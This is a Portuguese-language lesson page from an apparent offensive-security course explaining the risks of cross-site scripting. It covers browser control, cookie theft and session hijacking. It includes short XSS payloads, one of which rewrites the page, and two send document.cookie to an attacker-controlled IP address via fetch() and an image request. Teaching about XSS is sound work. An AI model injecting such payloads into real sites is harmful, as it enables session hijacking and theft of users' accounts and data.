Aula 38 | Riscos de uso do XSS

Aula 38 | Riscos de uso do XSS

Riscos de Uso do XSS

O que é XSS? Cross-Site Scripting (XSS) é uma vulnerabilidade de segurança que permite a injeção de código JavaScript em páginas web. Essa falha de segurança pode ser extremamente perigosa, pois permite que um atacante execute código malicioso no navegador do usuário.

Por que é uma Falha Perigosa? A injeção de JavaScript através de XSS pode levar a diversos problemas de segurança. A gravidade desses problemas pode variar dependendo do estado da vulnerabilidade e das versões dos sistemas e aplicações dos usuários. Aqui estão alguns dos riscos associados ao XSS:

Controle Total do Navegador

Em casos extremos, um atacante pode obter controle total sobre o navegador do usuário. Isso pode permitir que o atacante:

  • Modifique o Conteúdo da Página: Alterar o conteúdo exibido no navegador do usuário.

  • Redirecione para Sites Maliciosos: Levar o usuário a páginas fraudulentas.

  • Execute Comandos Arbitrários: Realizar ações indesejadas no navegador.

Roubo de Cookies

Cookies são pequenos arquivos de dados armazenados no navegador do usuário, utilizados para gerenciar sessões e lembrar preferências. Através de XSS, um atacante pode roubar esses cookies, incluindo cookies de sessão, o que pode levar a:

  • Sequestro de Sessão: O atacante pode se passar pelo usuário legítimo ao roubar o cookie de sessão.

  • Acesso a Informações Sensíveis: Os cookies podem conter informações confidenciais que podem ser exploradas pelo atacante.

Roubo de Sessões

Quando um atacante rouba o cookie de sessão do usuário, ele pode acessar a conta do usuário sem precisar de autenticação adicional. Isso pode resultar em:

  • Roubo de Identidade: O atacante pode realizar ações em nome do usuário, como enviar mensagens ou fazer compras.

  • Exposição de Dados Pessoais: Acesso a informações pessoais e confidenciais armazenadas na conta do usuário.

Exemplos Práticos:

Exemplo 1: Controle do Navegador

  • O atacante injeta um script que altera o conteúdo da página:

<script>
document.body.innerHTML = '<h1>Você agora é um NETCAT!</h1>';
</script>

Quando o usuário acessa a página, o script é executado e altera o conteúdo para exibir a mensagem "Você agora é um NETCAT!".

Exemplo 2: Roubo de Cookies

  • O atacante injeta um script que envia os cookies do usuário para um servidor controlado por ele:

<script>
fetch('http://192.168.1.223/rouba_cookie?' + document.cookie);
</script>

Esse script faz uma solicitação ao servidor do atacante, enviando os cookies do usuário.

Exemplo 3: Sequestro de Sessão

  • O atacante injeta um script que rouba o cookie de sessão do usuário:

<script>
var img = new Image();
img.src = 'http://192.168.1.223/rouba_sessao?' + document.cookie;
</script>

Quando o usuário acessa a página, o script envia o cookie de sessão para o atacante.

 

Sugestões de Aulas

Aula 39 | XSS Armazenado P1

Ver Aula

Aula 37 | XSS Refletido

Ver Aula

Aula 108 | SQL Injection no .onion

Ver Aula